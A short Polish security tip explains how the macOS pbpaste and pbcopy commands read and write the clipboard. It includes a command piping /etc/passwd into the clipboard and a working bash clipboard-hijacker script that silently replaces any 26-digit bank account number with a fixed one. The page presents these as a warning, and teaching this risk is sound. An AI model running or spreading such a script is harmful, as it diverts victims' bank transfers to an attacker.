alphasec academy

pbpaste - wykradnij zawartość schowka w macOS X

Dodatkowe informacje

pbpaste to konsolowe polecenie systemów spod znaku jabłka, które pobiera zawartość schowka. Komplementarnym poleceniem jest pbcopy, które z kolei wrzuci coś do schowka, np. by umieścić w schowku zawartość pliku /etc/passwd, moglibyśmy napisać:
cat /etc/passwd | pbcopy
pbpaste zadziała również w zdalnych sesjach, np. w przypadku kiedy znamy hasło użytkownika i zalogujemy się na jego komputer po ssh. Myślę, że RedTeamy już czują temat. ;)

Czy to groźne

Jako wizualizację jednego z niebezpieczeństw, zachęcam do przeanalizowania poniższego, bardzo prostego skryptu do uruchomienia na chociażby macbookach:
#!/bin/bash

slup="12200000001234123400000000"
while [ True ]; do
    clip=`pbpaste`
    if [[ "$clip" =~ ^[-0-9\ ]+$ ]]; then
        clip=${clip//[^0-9]/}
        if [[ "$clip" =~ ^[0-9]{26}$ ]]; then
            echo -n $slup|pbcopy
        fi
    fi
    sleep 1
done
A w bardziej czytelny i opisowy sposób, można poczytać sobie o tym w artykule Czy CTRL+C i CTRL+V mogą być groźne?, gdzie ten temat poruszany jest zarówno dla systemów Windows, macOS oraz Linux.

Przydatne linki


Subskrybuj

Jeśli chcesz otrzymywać nowe, mięsiste protipy na maila, a także zostać czasem powiadomiony o wartościowych wydarzeniach - dołącz do subskrybentów.